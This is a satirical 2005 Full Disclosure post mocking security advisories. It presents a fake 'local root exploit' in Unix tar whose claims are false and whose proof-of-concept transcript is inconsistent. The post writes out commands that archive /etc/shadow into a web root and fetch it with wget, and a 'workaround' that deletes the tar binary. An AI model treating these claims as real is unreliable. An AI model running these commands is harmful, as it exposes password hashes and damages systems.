Full Disclosure mailing list archives

UNIX Tar Security Advisory from TEAM PWN4GE
From: "Team Pwnge" <team_pwn4ge () outgun com>
Date: Thu, 03 Feb 2005 04:32:08 +0800

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
TEAM PWN4GE Security Advisory                                     PWNED
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: HIGH
     Title: TAR: Local root exploit using Tar
      Date: February 02, 2005

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An evil, malicious, vile, disgusting, atrocious vulnerability has been
found to exist on Unix based machines with the tar binary.


Background
==========

TAR is a Unix based tool used to compress files. It is nowhere near
as functional or useable as WinZip, but nevertheless Unix users need
love too.

Affected versions
=================

All versions of Unix based variants using TAR can be pwn0rf13d.

Description
===========

Shotgun Willie of TEAM PWN4G3 discovered that an unobservant (l)user
can extract the contents of a tarball overwriting his shadow (or for
those "others", master.passwd) files leading to maximum pwn4ge.

Proof of Concept
================

# tar -cf parishiltonpr0n.tar /etc/shadow
# mv /path/to/htdocs/parishiltonpr0n.tar
# ssh pwn4ge () localhost
pwn4ge () localhost's password:
Last login: Wed Feb  2 14:48:41 2005 from sec.msft.com
Sun Microsystems Inc.   SunOS 5.10       PWN4GEKERNEL Jan 2005
You have mail.
$ wget www.(PROTECTEDSITENAME).net/parishiltonpr0n.tar
--15:42:02--  http://www.(PROTECTEDSITENAME).net/parishiltonpr0n.tar
           => `parishiltonpr0n.tar'
Resolving www.(PROTECTEDSITENAME).net... done.
Connecting to www.(PROTECTEDSITENAME).net[198.81.129.100]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,163 [application/x-tar]

100%[=================================================================================>] 1,163          1.11M/s    ETA 00:00

15:42:02 (1.11 MB/s) - `rechecker.tar.gz' saved [1163/1163]
$ echo "w00t"
$ tar -xvf parishiltonpr0n.tar
tar: blocksize = 8
x /etc/shadow, 1100 bytes, 5 tape blocks
# echo "pwn3d d4t 3ss sux0r!@ h0 h0 h0"

Impact
======

All your nix belong to us.

Workaround
==========

On your shell: rm `which tar` & echo "Security is glorious amen"


Concerns?
=========

Security is a primary focus of TEAM PWN4GE and ensuring the
progress of a secure Interweb be our dreams and visions. As
security concerns should be addressed to respective vendors,
we feel the urge to bypass standards and bring our common
dreams of a secure homeland to the Interweb.

License
=======

Copyright 2005 TEAM PWN4GE

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
